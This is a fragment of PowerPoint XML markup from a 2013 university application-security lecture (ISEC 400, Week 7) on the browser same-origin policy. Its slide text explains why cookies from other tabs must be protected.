            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocols match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20307670">
            <a:off x="5539137" y="2323955"/>
            <a:ext cx="236571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Why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1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733800"/>
            <a:ext cx="1767993" cy="1822862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168833" y="4114800"/>
            <a:ext cx="4267200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74903"/>
              <a:gd name="adj2" fmla="val -28814"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If these all didn’t match, then scripts could read cookies from all open tabs (or open a hidden page and then read cookies).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1981200" y="990600"/>
            <a:ext cx="3707967" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70918"/>
              <a:gd name="adj2" fmla="val 106601"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So what?  Why is that a problem?  Because cookies are proxies for username/password in a session!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601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Browser Same Origin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7734300" cy="3495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4570616"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F7492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Todd's Franklin Template</Template>
  <TotalTime>3968</TotalTime>
  <Words>1236</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>183</Paragraphs>
  <Slides>26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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>Microsoft Visio Drawing</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 7</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Browser Same Origin Policy</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-29T21:04:40Z</dcterms:modified>
</cp:coreProperties>
</file>